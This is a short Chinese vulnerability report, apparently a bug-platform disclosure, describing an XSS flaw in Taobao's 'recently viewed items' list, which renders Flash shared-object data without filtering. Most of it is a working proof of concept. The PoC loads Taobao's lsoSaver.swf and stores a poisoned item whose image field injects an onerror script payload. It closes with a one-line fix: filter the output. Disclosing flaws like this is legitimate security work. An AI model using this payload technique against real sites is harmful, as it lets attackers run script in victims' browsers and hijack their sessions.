未对输出进行过滤
http://list.taobao.com/itemlist/default.htm
搜索页中有一个最近浏览商品的栏目,
从flash的shared objcet中取出数据之间展现,为进行过滤,如果shared objcet存在恶意数据,会造成xss.
[code ]<script>
function updateLsoSaverStatus(status){
if(status == 2){
document['J_lsoSaver'].save('tb_recent_viewed_items','[{"itemId":"16023262435","pic":"i1%2FT1o4T0Xn4hXXbdPVbb_122616.jpg%22><img src=2 onerror=alert(document.domain)>","price":"15800","title":"%E9%A1%BA%E8%BE%BE%E9%93%B6%E9%B2%B8%E7%81%B5%E6%B6%A6%E9%AB%98%E5%8E%8B%E9%94%85%E5%A4%8D%E5%BA%95%E4%B8%8D%E9%94%88%E9%92%A2%E5%8E%8B%E5%8A%9B%E9%94%85%2024cm%20%E8%B6%85%E5%8E%9A%E9%AB%98%E5%8E%8B%E9%94%85SDF-9624","isDaily":false},{"url":"http%3A%2F%2Fitem.taobao.com%2Fitem.htm%3Fid%3D15621327776","itemId":"15621327776","xid":"","pic":"i2%2FT1q1iGXkpzXXbDQSTb_094946.jpg","price":"8900","itemIdStr":"15621327776","title":"%E4%B8%93%E6%9F%9C%E6%AD%A3%E5%93%81%20%E9%A1%BA%E8%BE%BE20CM%20%E7%BB%84%E5%90%88%E7%9B%96%E5%A4%8D%E5%BA%95%E6%97%A5%E5%BC%8F%E8%92%B8%E9%94%85SDF-8121%E4%B8%8D%E9%94%88%E9%92%A2%E8%92%B8%E7%85%AE%E9%94%85","isDaily":false}]')
}
}
</script>
Taobao xss poc
<object id="J_lsoSaver" tabindex="-1" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
<param name="movie" value="http://a.tbcdn.cn/app/tbskip/lsoSaver.swf">
<param name="allowScriptAccess" value="always">
<embed name="J_lsoSaver" src="http://a.tbcdn.cn/app/tbskip/lsoSaver.swf" width="1" height="1" allowscriptaccess="always" type="application/x-shockwave-flash" pluginspage="http://www.adobe.com/go/getflashplayer">
</object>[/code]
修复方案:
输出过滤
